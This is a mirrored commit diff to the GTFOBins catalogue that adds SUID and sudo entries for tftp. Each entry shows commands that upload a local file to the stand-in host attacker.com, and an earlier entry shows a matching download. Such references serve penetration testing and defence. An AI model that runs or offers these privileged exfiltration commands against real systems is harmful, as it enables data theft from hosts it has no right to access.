mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-08-23 09:34:56 +02:00
Add suid-enabled and sudo-enabled to tftp
This commit is contained in:
@@ -12,4 +12,16 @@ functions:
|
|||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
tftp $RHOST
|
tftp $RHOST
|
||||||
get file_to_get
|
get file_to_get
|
||||||
|
suid-enabled:
|
||||||
|
- description: Send local file to a TFTP server.
|
||||||
|
code: |
|
||||||
|
RHOST=attacker.com
|
||||||
|
./tftp $RHOST
|
||||||
|
put file_to_send
|
||||||
|
sudo-enabled:
|
||||||
|
- description: Send local file to a TFTP server.
|
||||||
|
code: |
|
||||||
|
RHOST=attacker.com
|
||||||
|
sudo -E tftp $RHOST
|
||||||
|
put file_to_send
|
||||||
---
|
---
|
||||||
|
Reference in New Issue
Block a user